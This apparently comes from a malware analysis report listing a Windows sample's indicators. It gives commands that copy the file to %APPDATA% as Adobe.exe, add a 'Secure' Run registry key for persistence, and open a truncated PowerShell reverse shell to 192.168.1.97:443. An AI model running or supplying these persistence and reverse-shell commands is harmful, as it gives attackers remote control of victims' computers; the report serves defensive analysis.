Technical Information
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Secure' = '%APPDATA%\Adobe.exe'
- %APPDATA%\<File name>.exe
- '<LOCALNET>.1.97':443
- '<SYSTEM32>\cmd.exe' /c copy <Full path to file> %appdata%' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy <Full path to file> %appdata%
- '<SYSTEM32>\cmd.exe' /c cmd /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V "Secure" /t REG_SZ /F /D "%appdata%\Adobe.exe
- '<SYSTEM32>\cmd.exe' /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V "Secure" /t REG_SZ /F /D "%APPDATA%\Adobe.exe
- '<SYSTEM32>\reg.exe' ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V "Secure" /t REG_SZ /F /D "%APPDATA%\Adobe.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.97',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $byt...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.97',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)...